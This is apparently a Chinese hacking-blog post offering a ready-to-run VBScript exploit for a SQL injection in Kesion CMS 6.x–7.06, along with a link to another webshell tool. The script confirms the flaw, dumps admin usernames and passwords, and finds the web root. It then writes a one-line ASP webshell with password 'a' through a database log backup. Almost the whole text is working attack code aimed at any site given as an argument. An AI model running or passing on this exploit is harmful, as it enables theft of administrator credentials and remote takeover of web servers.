提供个工具吧,在mssql显错模式下可以直接获得webshell: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具:

'*=========================================================================
'* Intro   科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具
'* Usage   在命令提示符下输入:Cscript.exe Exp.vbs www.target.com
'* Author  雨中风铃
'* WEB     http://hi.baidu.com/yanfei6
'*=========================================================================

Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        PostData = .ResponseText
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function BackDB(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send()
        WScript.Echo "[ " & .Status & " " & .statusText & " ] " & Unescape(Unescape(PostUrl))
        If .Status<>200 Then
            WScript.Echo "日志差异备份出错!"
            WScript.Quit
        End If
    End With
    Set Http = Nothing
    Wscript.Sleep 2000
End Function

Function IsSuccess(PostUrl, strSign)
    strData = PostData(PostUrl)
    'Wscript.Echo strData
    if InStr(strData, strSign) >0 then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
End Function

Function Encode(strData)
    Dim strTemp, I
    For I = 1 To Len(strData)
        strTemp = strTemp & "%25" & Hex(Asc(Mid(strData, I, 1)))
    Next
    Encode = strTemp & "%2500"
End Function

Function getData(strData, patrn)
    dim strTemp
    Set re = New RegExp
    re.Pattern = patrn
    re.IgnoreCase = True
    re.Global = True
    Set Matches = re.Execute(strData)
    For i = 0 To Matches.Count - 1
        If Matches(i).Value<>"" Then
            strTemp = strTemp & vbCrLf & Matches(i).SubMatches(0)
        End If
    Next
    getData = strTemp
End Function

If WScript.Arguments.Count <> 1 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
    WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If

strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "恭喜!存在漏洞"
Else
    WScript.Echo "没有检测到漏洞"
    WScript.Quit
End If

strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "数据库为:MSSQL"
    bAccess = False
Else
    WScript.Echo "数据库为:ACCESS"
    bAccess = True
End If

strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")

strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
    WScript.Echo "网站绝对路径:" & strWebPath
End If

If Not bAccess Then
    strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
    strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
    strDatabase = Replace(strDatabase, vbCrLf, "")
    WScript.Echo "MSSQL数据库名为:" & strDatabase
End If

WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
    BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
    BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))
    BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
    BackDB(strHoleUrl & Encode("';drop table cmd"))
    BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a"

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具